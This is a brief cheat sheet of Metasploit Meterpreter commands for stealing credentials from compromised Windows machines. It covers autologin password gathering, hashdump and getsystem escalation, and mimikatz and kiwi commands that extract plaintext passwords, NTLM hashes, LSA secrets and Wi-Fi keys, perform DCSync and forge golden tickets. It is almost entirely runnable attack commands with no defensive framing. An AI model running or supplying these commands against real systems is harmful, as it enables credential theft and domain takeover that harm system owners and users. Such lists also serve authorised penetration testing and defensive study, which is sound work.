Metasploit

1. Basic

1. Grab the password for automatic login

run windows/gather/credentials/windows_autologin

2. You can use this command to query hashdump if you haven't raised the rights

run windows/gather/smart_hashdump

3. Right escalation

getsystem

4. Run hashdump to get the password after escalation

run hashdump

2. mimikatz module

1. Load mimikatz module to get more permissions

ps: The mimikatz module has been merged into the kiwi module

load mimikatz

kerberos: kerberos related modules

 livessp: try to retrieve livessp credentials

 mimikatz_command: Run a customized command

 msv: msv credential related module, lists the user password hash of the target host

 ssp: ssp credential related modules

 tspkg: modules related to tspkg credentials

 wdigest: modules related to wdigest credentials

Use the mimikatz_command command to get the plaintext password

mimikatz_command -f sekurlsa::searchPasswords

3. kiwi module

1. The kiwi module is more powerful than mimikatz

load kiwi

 creds_all: List all credentials
 creds_kerberos: List all kerberos credentials
 creds_msv: List all msv credentials
 creds_ssp: List all ssp credentials
 creds_tspkg: List all tspkg credentials
 creds_wdigest: List all wdigest credentials
 dcsync: Retrieve user account information through DCSync
 dcsync_ntlm: Retrieve user account NTLM hash, SID and RID through DCSync
 golden_ticket_create: Create a gold ticket
 kerberos_ticket_list: List kerberos tickets
 kerberos_ticket_purge: clear kerberos tickets
 kerberos_ticket_use: Use kerberos ticket
 kiwi_cmd: execute mimikatz commands, followed by mimikatz.exe commands
 lsa_dump_sam: dump the SAM of lsa
 lsa_dump_secrets: dump the secret text of lsa
 password_change: change password
 wifi_list: List the wifi configuration files of the current user
 wifi_list_shared: List shared wifi configuration files/coding